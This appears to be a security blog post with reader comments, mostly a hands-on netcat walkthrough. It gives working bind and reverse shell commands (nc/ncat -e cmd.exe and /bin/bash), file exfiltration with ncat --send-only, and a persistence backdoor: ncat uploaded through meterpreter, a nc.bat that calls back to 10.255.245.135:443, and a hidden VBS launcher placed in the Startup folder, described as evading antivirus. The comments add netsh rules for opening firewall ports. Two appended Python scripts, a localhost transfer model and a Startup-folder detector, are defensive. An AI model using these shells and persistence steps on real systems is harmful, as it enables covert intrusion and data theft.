Netcat 1.10
===========

Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Netcat, or "nc" as the actual program is named, should have been supplied long ago as another one of those cryptic but standard Unix tools.

Bind shell: Windows listens and hands out cmd.exe, Linux connects to it.

Windows
C:\Documents and Settings\host\Desktop>nc -lvvp 4444 -e cmd.exe

Linux
root@bt:~# nc -v 192.168.1.2 4444
10.255.245.136: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.2] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\host\Desktop>
------------------------------------------------------------
The other way round: Windows listens, Linux connects and hands out /bin/bash.

Windows
C:\Documents and Settings\host\Desktop>nc -lvvp 4444
listening on [any] 4444 ...

Linux
root@bt:~# nc -v 192.168.1.4 4444 -e /bin/bash
10.255.245.136: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.4] 4444 (?) open

Back on Windows, type ifconfig:
C:\Documents and Settings\host\Desktop>nc -lvvp 4444
listening on [any] 4444 ...
192.168.1.4: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.255.245.136] from (UNKNOWN) [192.168.1.4] 59987: NO_DATA
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:01:02:03:04:05
          inet addr:192.168.1.4  Bcast:10.255.245.255  Mask:255.255.255.0
------------------------------------------------------------
To make a Windows machine connect back to the BackTrack machine, open a terminal and type in nc -lvvp 80:

root@bt:~# nc -lvvp 80
listening on [any] 80 ...

Then on the Windows machine, typing the following will make it dial back to your machine (replace your-ip-address with the BackTrack machine's address):
ncat -v your-ip-address 80 -e cmd.exe

C:\Program Files\Nmap>ncat -v your-ip-address 80 -e cmd.exe
Ncat: Version 6.00 ( http://nmap.org/ncat )
Ncat: Connected to your-ip-address:80.

The Windows machine should now have connected to you; you should see the cmd.exe prompt appear in the open listener window on your BackTrack machine.
==============================================
Once connected you may want to send files back from the Windows machine to BackTrack. Open a new window in BackTrack and type in ncat -v -lp 2223 > test-doc.txt:

root@bt:~# ncat -v -lp 2223 > test-doc.txt
Ncat: Version 5.61TEST4 ( http://nmap.org/ncat )
Ncat: Listening on :::2223
Ncat: Listening on 0.0.0.0:2223

In the window that has the connection to the Windows machine, move to the directory that has the file you want and type in ncat --send-only your-ip-address 2223 < test-doc.txt:

C:\Program Files\Cisco Systems\VPN Client\Profiles>ncat --send-only your-ip-address 2223 < test-doc.txt
ncat --send-only your-ip-address 2223 < test-doc.txt

Then go to your root folder in BackTrack and look for the file you moved across; here it was called test-doc.txt. You can move any file, not just .txt! Two things to keep in mind: the shell redirect on the listener overwrites test-doc.txt on the BackTrack side, and the transfer is finished when the sender closes the connection, at which point the listener exits (it serves one connection unless you tell ncat to keep listening). Netcat does no integrity checking of its own, so compare a hash of the file on both ends if it matters.
==============================================
Linux - Linux
root@bt:~# nc -lvvp 4444
root@bt:~# nc -v 192.168.1.4 4444 -e /bin/bash
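The file transfer above works because netcat simply copies bytes between the socket and the redirected file: the receiver writes everything it reads until the sender closes, and ncat --send-only streams the file and then half-closes the connection so the receiver sees end-of-file. The following Python script is an added example (not code from the original post or from the Ncat project) that models exactly that exchange on 127.0.0.1 with an ephemeral port, using a thread for the listening side, and hashes the bytes on both ends the way you would with sha256sum after a real transfer. The payload is a constructed sample.

```python
"""Model of `ncat -lp PORT > file` (receiver) and `ncat --send-only HOST PORT < file`
(sender) over a plain TCP socket, with a SHA-256 check on both ends.
Added example, not from the original post. Localhost only."""
import hashlib
import os
import socket
import tempfile
import threading
from typing import Tuple


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def receive_file(listener: socket.socket, out_path: str) -> str:
    """Like `ncat -lp PORT > out_path`: accept one connection, write until EOF,
    return the hash of what was written."""
    conn, _peer = listener.accept()
    h = hashlib.sha256()
    with conn, open(out_path, "wb") as f:
        while True:
            chunk = conn.recv(65536)
            if not chunk:          # sender closed its write side: transfer complete
                break
            f.write(chunk)
            h.update(chunk)
    return h.hexdigest()


def send_file(host: str, port: int, in_path: str) -> str:
    """Like `ncat --send-only host port < in_path`: stream the file, then half-close
    so the receiver gets EOF without us waiting for anything back."""
    h = hashlib.sha256()
    with socket.create_connection((host, port)) as s, open(in_path, "rb") as f:
        while True:
            chunk = f.read(65536)
            if not chunk:
                break
            s.sendall(chunk)
            h.update(chunk)
        s.shutdown(socket.SHUT_WR)  # this is what --send-only does after the last byte
    return h.hexdigest()


def transfer(data: bytes) -> Tuple[str, str, bytes]:
    """Run both ends locally; return (hash sent, hash received, received bytes)."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "test-doc.txt")
        dst = os.path.join(d, "received.txt")
        with open(src, "wb") as f:
            f.write(data)

        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.bind(("127.0.0.1", 0))       # port 0: let the OS pick a free port
        listener.listen(1)
        port = listener.getsockname()[1]

        result = {}
        rx = threading.Thread(target=lambda: result.update(rx=receive_file(listener, dst)))
        rx.start()
        tx_hash = send_file("127.0.0.1", port, src)
        rx.join()
        listener.close()

        with open(dst, "rb") as f:
            received = f.read()
    return tx_hash, result["rx"], received


if __name__ == "__main__":
    payload = b"constructed sample payload line\n" * 1000   # constructed test data
    sent, got, body = transfer(payload)
    print("sent     sha256:", sent)
    print("received sha256:", got)
    print("hashes match:", sent == got)
```

The two hashes are the check netcat itself never gives you: a truncated transfer (the connection dropping before the sender's half-close) leaves a shorter file on the listener side with no error message, and only the hash comparison reveals it.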
==============================================
Continued AV bypass testing.
Testing with Win 7.
We're not ready to release the initial exploit that got us to a meterpreter session.
To be honest, that is because it does not trigger under any AV.
Once the box is exploited, uploading the files listed below does not trigger AV either.
All of the files can be found by installing nmap on a Windows machine: open the install folder and copy out what you require. Note that ncat.exe is uploaded together with libeay32.dll and ssleay32.dll, the OpenSSL libraries it is linked against; without them next to it, ncat.exe will not start.
meterpreter > upload /root/nmap/ C:\
[*] uploading : /root/nmap//ncat.exe -> C:\\ncat.exe
[*] uploaded : /root/nmap//ncat.exe -> C:\\ncat.exe
[*] uploading : /root/nmap//libeay32.dll -> C:\\libeay32.dll
[*] uploaded : /root/nmap//libeay32.dll -> C:\\libeay32.dll
[*] uploading : /root/nmap//VBS.vbs -> C:\\VBS.vbs
[*] uploaded : /root/nmap//VBS.vbs -> C:\\VBS.vbs
[*] uploading : /root/nmap//Notes -> C:\\Notes
[*] uploaded : /root/nmap//Notes -> C:\\Notes
[*] uploading : /root/nmap//nc.bat -> C:\\nc.bat
[*] uploaded : /root/nmap//nc.bat -> C:\\nc.bat
[*] uploading : /root/nmap//ssleay32.dll -> C:\\ssleay32.dll
[*] uploaded : /root/nmap//ssleay32.dll -> C:\\ssleay32.dll
[*] uploading : /root/nmap//nmap.exe -> C:\\nmap.exe
[*] uploaded : /root/nmap//nmap.exe -> C:\\nmap.exe
————————————————————
nc.bat script:
C:\ncat.exe -v 10.255.245.135 443 -e cmd.exe
VBS.vbs script, used to run the nc.bat script invisibly (the trailing 0 is the window style, which hides the console window):
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "C:\nc.bat" & Chr(34), 0
Set WshShell = Nothing
————————————————————
Getting a shell so we can move VBS.vbs to the Startup folder, which makes the script run each time the user logs in.
meterpreter > execute -f cmd.exe -c
Process 3176 created.
Channel 8 created.
meterpreter > shell
Process 3864 created.
Channel 11 created.
Microsoft Windows [Version 6]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\test\Documents>move C:\VBS.vbs "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
1 file(s) moved.
————————————————–
Rebooting the Win 7 box to test whether the startup script works.
C:\Users\test\Documents>shutdown -r -t 0
————————————————–
Back on BackTrack, open a new terminal and set up the nc listener on the port nc.bat dials out to (443).
Once the user logs back into the account after the reboot, VBS.vbs runs and the box connects back:
root@bt:~# nc -lvvp 443
listening on [any] 443 …
Remote-IP: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.255.245.135] from (UNKNOWN) [Remote-IP] 49156
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
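The persistence above leaves two small, readable artefacts in the user's Startup folder: a .vbs that launches something with window style 0 (hidden) and a .bat that runs nc/ncat with -e. The following Python script is an added example, not part of the original post, that hunts for exactly that pattern. It knows the two standard Windows Startup folder locations (per-user under %APPDATA% and all-users under %ProgramData%) and scans them when run on a Windows host; the demo() function instead builds a temporary folder holding constructed copies of the VBS.vbs and nc.bat scripts from this walkthrough plus a benign text file, so it can be run anywhere. The regular expressions are my own heuristics, not a signature from any product.

```python
"""Hunt for startup-folder netcat persistence: a .vbs that runs a program with a
hidden window (WshShell.Run ..., 0) and a .bat/.cmd that launches nc/ncat with -e.
Added example, not code from the original post."""
import os
import re
import tempfile
from typing import Dict, List


def windows_startup_dirs() -> List[str]:
    """Standard per-user and all-users Startup folders (empty list off Windows)."""
    dirs = []
    appdata = os.environ.get("APPDATA")
    if appdata:
        dirs.append(os.path.join(appdata, r"Microsoft\Windows\Start Menu\Programs\Startup"))
    programdata = os.environ.get("ProgramData")
    if programdata:
        dirs.append(os.path.join(programdata, r"Microsoft\Windows\Start Menu\Programs\StartUp"))
    return dirs


# WshShell.Run "...", 0  -> window style 0 means the launched console is hidden
HIDDEN_RUN = re.compile(r"\.Run\s*\(?.*,\s*0\b", re.IGNORECASE)
# nc / ncat / netcat invoked with -e, i.e. "hand a program to whoever connects"
NC_EXEC = re.compile(r"\b(nc|ncat|netcat)(\.exe)?\b.*\s-e\s", re.IGNORECASE)
# dotted-quad address followed by a port, to report where it dials out to
ADDR_PORT = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")


def inspect_file(path: str) -> List[str]:
    """Findings for one startup item; an empty list means nothing suspicious."""
    findings: List[str] = []
    ext = os.path.splitext(path)[1].lower()
    try:
        with open(path, "r", errors="replace") as f:
            text = f.read()
    except OSError:
        return findings
    if ext == ".vbs" and "wscript.shell" in text.lower() and HIDDEN_RUN.search(text):
        findings.append("VBScript launches a program with a hidden window")
    if ext in (".bat", ".cmd", ".vbs") and NC_EXEC.search(text):
        where = ADDR_PORT.search(text)
        target = " -> %s:%s" % (where.group(1), where.group(2)) if where else ""
        findings.append("netcat-style connect-back with -e" + target)
    return findings


def scan_startup_dir(directory: str) -> Dict[str, List[str]]:
    """Map each flagged file name in `directory` to its findings."""
    report: Dict[str, List[str]] = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            hits = inspect_file(path)
            if hits:
                report[name] = hits
    return report


def build_sample_startup_dir(directory: str) -> None:
    """Constructed sample: the two scripts from the walkthrough plus a benign file."""
    with open(os.path.join(directory, "VBS.vbs"), "w") as f:
        f.write('Set WshShell = CreateObject("WScript.Shell")\n'
                'WshShell.Run chr(34) & "C:\\nc.bat" & Chr(34), 0\n'
                'Set WshShell = Nothing\n')
    with open(os.path.join(directory, "nc.bat"), "w") as f:
        f.write("C:\\ncat.exe -v 10.255.245.135 443 -e cmd.exe\n")
    with open(os.path.join(directory, "readme.txt"), "w") as f:
        f.write("nothing to see here\n")


def demo() -> Dict[str, List[str]]:
    """Scan a temporary folder seeded with the constructed sample files."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_startup_dir(d)
        return scan_startup_dir(d)


if __name__ == "__main__":
    for target in windows_startup_dirs():
        if os.path.isdir(target):
            print(target, scan_startup_dir(target))
    print(demo())
```

On the constructed sample this reports VBS.vbs for the hidden-window launch and nc.bat for the connect-back to 10.255.245.135:443, and nothing for readme.txt. Pair it with a look at the listening and established connections on the box (netstat -ano on Windows) to confirm whether the dial-out is actually live.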
Updates
Hi! What about Win 7 with the firewall on? Working or not?
Hi Andrej, thanks for the question, I appreciate that you read the blog. Quick reply: yes, it should work. If on the Windows machine you typed
ncat -v your-machines-ip-address 80 -e cmd.exe
the Windows machine will connect out on port 80 (HTTP), so it will look just like normal internet traffic. Firewalls normally do not block HTTP. The exception to this is larger estates that use a proxy and whose internal firewall only allows the proxy out to the internet.
Try tunnelling all your traffic over port 80. On a different note, you could change the FW or turn it off once you have access via ncat anyway.
Give it a try. With regards to OS, netcat doesn't care if it's Windows XP, Vista, 7 or Linux.
It's a very good tool.
Thank you for your reply.
It's working:
My test:
1. NetCat test: Windows Vista Home Basic SP1, firewall is on
c:\tools>nc -l -v -p80 -e cmd.exe
listening on [any] 80 …
192.168.235.10: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.235.1] from (UNKNOWN) [192.168.235.10] 34431: NO_DATA
2. VMware: BackTrack 5R2
root@bt:~# nc -v 192.168.235.1 80
192.168.235.1: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.235.1] 80 (www) open
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
c:\tools>dir
dir
 Volume in drive C is OS
 Volume Serial Number is 6892-B5E7
 Directory of c:\tools
———————————————————————————————
But the Windows firewall detects and, by default, blocks programs from opening
TCP/IP sockets and listening for incoming connections.
How do I add exceptions to the firewall???
I can't find a good "exploit" for Windows Vista 🙂 Is it a fortress??? 🙂
Great to see you testing. For adding exceptions to the Windows firewall please look at
http://www.myexploit.wordpress.com/control-windows-firewall-from-the-command-line/
A quick example below should allow TCP port 80 in on Win 7, so it should work on Vista too:
netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80
You could change the port number to any you require.
With regards to exploiting Vista/Win7, we are in full agreement that it's been improved and is now hard to exploit. The best way is to look at exploiting the apps on it. Browsers are still very exploitable. Try this example in your lab.
http://www.myexploit.wordpress.com/control-metasploit-browser_autopwn/
Hi !
Thank you for your help.
I created my backdoor on Windows XP with NetCat.
http://msfbt.wordpress.com/2012/06/06/creating-a-netcat-backdoor-on-a-windows-xp/
But I'm still working with exploits (metasploit) + Win Vista (or Win 7).
Regards
Andrej
Hi Andrej, no problem, happy you looked at the blog.
Forget the metasploit ms08_067_netapi exploit: the buffer overflow was fixed with an update for XP and by default in Vista onwards. So no joy with Win 7.
Conficker uses the ms08_067_netapi exploit so, as you can imagine, a large percentage of estates have now defended against it. As they should! Also it's rare to find port 445 open on the outside.
With regards to a Win7 exploit, have a go at
http://www.myexploit.wordpress.com/control-respect-to-armitage1989/
This will slip past AV and works against Win7